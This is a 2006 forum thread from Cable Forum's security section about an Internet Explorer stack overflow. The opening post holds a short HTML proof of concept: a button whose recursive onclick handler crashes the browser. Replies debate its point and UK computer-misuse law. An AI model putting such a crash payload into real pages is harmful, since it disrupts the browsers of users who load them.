Home News Forum Articles
  Welcome back Join CF
You are here You are here: Home | Forum | Internet Explorer Interpreter Stack Overflow


You are currently viewing our boards as a guest which gives you limited access to view most of the discussions, articles and other free features. By joining our Virgin Media community you will have full access to all discussions, be able to view and post threads, communicate privately with other members (PM), respond to polls, upload your own images/photos, and access many other special features. Registration is fast, simple and absolutely free so please join our community today.


Welcome to Cable Forum
Go Back   Cable Forum > Computers & IT > Security & Virus Discussion

Internet Explorer Interpreter Stack Overflow
Reply
 
Thread Tools
Old 31-05-2006, 10:49   #1
Karateka
 
Gareth's Avatar
 
Join Date: Dec 2003
Age: 33
Posts: 7,098
Gareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny stars
Gareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny stars
Internet Explorer Interpreter Stack Overflow

Oops

<html>
<input type="button" name="btn" onclick="document.all['btn'].onclick(0);document.write('');">
</html>
__________________
Quidquid latine dictum sit, altum sonatur.
Gareth is offline   Reply With Quote
Old 31-05-2006, 12:47   #2
while(!naked){--clothes}
 
ikthius's Avatar
 
Join Date: Mar 2004
Location: Glasgow, Scotland
Services: anything for a new job
Posts: 4,100
ikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronze
ikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronzeikthius is cast in bronze
Re: Internet Explorer Interpreter Stack Overflow

but what does this actually do apart from crash IE.

and nothing happens on FF either.....

so what is the point in having a test like this, as most websites will be written correctly anyway.

I just don't understand.

ik
__________________
Let me guess, you picked out yet another colorful box with a crank that I'm expected to turn and turn until OOP! big shock, a jack pops out and you laugh and the kids laugh and the dog laughs and I die a little inside.
ikthius is offline   Reply With Quote
Old 31-05-2006, 14:36   #3
 
Druchii's Avatar
 
Join Date: Mar 2006
Location: Oslo, Norway.
Services: Get.no 26Mb/3Mb Cable
Posts: 6,559
Druchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronze
Druchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronzeDruchii is cast in bronze
Send a message via Skype™ to Druchii
Re: Internet Explorer Interpreter Stack Overflow

Hehe, i like it :p

Nice to know it's so easy to crash a browser...
__________________
Intel C2D E8400@4Ghz (52c) | 2Gb HyperX RAM | nVidia 8800GT 512Mb (700/1000) | Corsair VX550w PSU | Gigabyte EP35-DS3R | Win XP SP3 | 500Gb Seagate Barracuda 7200.11
Druchii is offline   Reply With Quote
Old 31-05-2006, 15:08   #4
cf.geek
 
grubbymitts's Avatar
 
Join Date: Mar 2005
Posts: 515
grubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond reputegrubbymitts has a reputation beyond repute
Re: Internet Explorer Interpreter Stack Overflow

I'm being a bit of a killjoy here, I know, but publishing code that purposefully crashes a piece of software/computer could contravene the UK Misuse of Computers Act 1990 and the person who contravenes this act could face 6 months imprisonment and a fine. I'm not a lawyer, but I have been studying this law for a bit this week due to something I have to do for my job, so be careful.
__________________
"Work and pray, live on hay, You'll get pie in the sky when you die." - Joe Hill
grubbymitts is offline   Reply With Quote
Old 31-05-2006, 15:18   #5
Cable Forum Team
 
Stuart C's Avatar
 
Join Date: Jun 2003
Location: It's Lahndun, Innit?
Age: 37
Services: Virgin for TV, BT for phone and Be* for Broadband.
Posts: 17,477
Stuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny stars
Stuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny starsStuart C has a pair of shiny stars
Send a message via MSN to Stuart C Send a message via Yahoo to Stuart C Send a message via Skype™ to Stuart C
Re: Internet Explorer Interpreter Stack Overflow

Gareth, it would probably work better if the forum didn't block HTML..
__________________
Just to make it clear if a post is bold and is from a team member, it's a moderating decision. If it's not bold or not from a team member, it's not.

"This is an important announcement. This is flight 121 to Los Angeles. If your travel plans today do not include Los Angeles, now would be a perfect time to disembark.”
Stuart C is offline   Reply With Quote
Old 31-05-2006, 17:09   #6
Karateka
 
Gareth's Avatar
 
Join Date: Dec 2003
Age: 33
Posts: 7,098
Gareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny stars
Gareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny starsGareth has a pair of shiny stars
Re: Internet Explorer Interpreter Stack Overflow

Quote:
Originally Posted by Stuart C
Gareth, it would probably work better if the forum didn't block HTML..
Nope, that was intentional... I only wanted to post the proof of concept, I didn't want to crash peoples' browsers

Although I can do that, if you want

---------- Post added at 17:04 ---------- Previous post was at 17:01 ----------

Quote:
Originally Posted by ikthius
but what does this actually do apart from crash IE.

and nothing happens on FF either.....

so what is the point in having a test like this, as most websites will be written correctly anyway.

I just don't understand.

ik
It's a stack overflow... it kills the browser as soon as you click the bog-standard html form button that is displayed. Admittedly, it's only a stack overflow and not a buffer overflow, so the consequences aren't as bad. The flaw is there, however, for all to see - and it's not exactly rocket science.

---------- Post added at 17:09 ---------- Previous post was at 17:04 ----------

Quote:
Originally Posted by grubbymitts
I'm being a bit of a killjoy here, I know, but publishing code that purposefully crashes a piece of software/computer could contravene the UK Misuse of Computers Act 1990 and the person who contravenes this act could face 6 months imprisonment and a fine. I'm not a lawyer, but I have been studying this law for a bit this week due to something I have to do for my job, so be careful.
No worries, mate... I do this for my job too. I'm in IT Security for a major high street financial organisation... incidentally we work a lot with MS and NISCC amongst others.

Although you're right that the law is not clear-cut as to what constitutes a breach of the CA, I'm not worried about posting a PoC
__________________
Quidquid latine dictum sit, altum sonatur.
Gareth is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


All times are GMT +1. The time now is 02:27.


Links
Google
 
Web www.cableforum.co.uk


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Copyright © 2003 - 2008, Cable Forum.
(s204569790.onlinehome.info)